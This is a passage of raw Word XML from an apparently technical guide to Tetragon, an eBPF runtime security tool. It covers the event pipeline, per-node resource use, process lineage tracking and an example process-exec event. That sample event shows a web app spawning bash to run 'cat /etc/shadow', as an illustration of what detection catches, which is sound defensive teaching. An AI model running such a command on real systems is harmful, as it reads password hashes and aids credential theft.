      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EBPF PROGRAM RUNS — the policy-compiled eBPF program evaluates conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MAP LOOKUPS — process context, policy state, allowlists retrieved from BPF maps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DECISION — the eBPF program decides: emit event? block? kill?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ACTION TAKEN — if blocking, return non-zero from LSM hook; if killing, send a SIGKILL via bpf_send_signal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EVENT PRODUCED — event placed in ring buffer for userspace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USERSPACE PICKS UP — agent reads from ring buffer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ENRICHMENT — Kubernetes metadata added.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EMISSION — event published to subscribers (gRPC clients, log files, OTel).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For DETECTION events, all this happens asynchronously — the syscall completes normally. For ENFORCEMENT events, the action (block/kill) happens SYNCHRONOUSLY in the kernel; the syscall is stopped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Scale Characteristics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Typical Tetragon agent footprint per node:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CPU: 1-3% under normal load; can spike higher with noisy policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory: 100-500 MB (process tracking maps grow with process count).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Event rate: depends on policies; 100-10,000 events/sec/node typical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scaling considerations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HIGH-CHURN WORKLOADS — lots of process starts/exits consume tracking memory. CI runner nodes can stress this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VERBOSE POLICIES — policies matching many events produce high event rates; tune to match actual interest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DOWNSTREAM BOTTLENECK — if your SIEM can't keep up with event volume, events may queue or drop.</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5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Process Lineage: The Foundational Signal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Why Process Lineage Matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon's most distinctive feature is how deeply it tracks PROCESS LINEAGE — the chain of ancestors for every process on the system. Why is this central?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider: "bash was executed." Is this suspicious? You can't tell without context. Bash in these situations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User logged into a debug container and typed commands — fine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">systemd starts a backup script that launches bash — fine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The web app's Node.js process spawns bash to run shell commands — very suspicious.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The FIRST LEVEL of context (parent = sshd, cron, node) differentiates these. But deeper lineage matters too:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">node was started by kubectl exec (user-initiated) vs. by the container entrypoint (app-initiated).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cron was started by init (normal) vs. by some other path (maybe a container escape).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full lineage — parent, grandparent, great-grandparent, all the way to init — is what distinguishes benign from malicious.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 What Tetragon Tracks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For every process on the monitored node, Tetragon maintains:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PID (process ID).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EXEC_ID — a Tetragon-assigned unique identifier (more stable than PID).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FULL COMMAND LINE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EXECUTABLE PATH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PARENT EXEC_ID (to chain ancestry).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ALL ANCESTRORS — up to the container init or system init.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CAPABILITIES.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UID, GID, SUID, SGID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NAMESPACE INFO — PID namespace, mount namespace, network namespace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CGROUP INFO — links to Kubernetes pod/container.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BINARY HASH — useful for detecting unexpected binaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EXEC TIMESTAMP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EXIT TIMESTAMP (when the process ends).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Example Process Event</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A typical Tetragon process-exec event (JSON):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "process_exec": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "process": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "exec_id": "a7f8b9c0:1234567:5678",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "pid": 12345,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "uid": 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "cwd": "/app",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "binary": "/bin/bash",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "arguments": "-c 'cat /etc/shadow'",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "flags": "execve clone",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "start_time": "2026-03-15T14:22:01Z",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "pod": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "namespace": "production",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "name": "webapp-7f9b-abc",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "container": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          "id": "abc123def456",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          "image": { "name": "my-app:v1.2"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"docker": "abc123def456",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "cap": "AuditWrite BlockSuspend Chown DacOverride ...",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "ns": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "pid": { "inum": 4026532147 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "mnt": { "inum": 4026532148 },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "net": { "inum": 4026531992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"parent": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "exec_id": "a7f8b9c0:1234000:0001",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "pid": 12001,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "binary": "/usr/bin/node",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      "arguments": "server.js"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"ancestors": [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      { "exec_id": "a7f8b9c0:1000000:0000",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "binary": "/sbin/runc" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      { "exec_id": "a7f8b9c0:0500000:0000",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "binary": "/usr/bin/containerd-shim"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This single event tells you EVERYTHING: that bash was executed, by a Node.js process (the web app), running /etc/shadow as argument, inside a specific container in a specific pod. A security analyst can understand the severity in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 How Lineage Is Maintained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
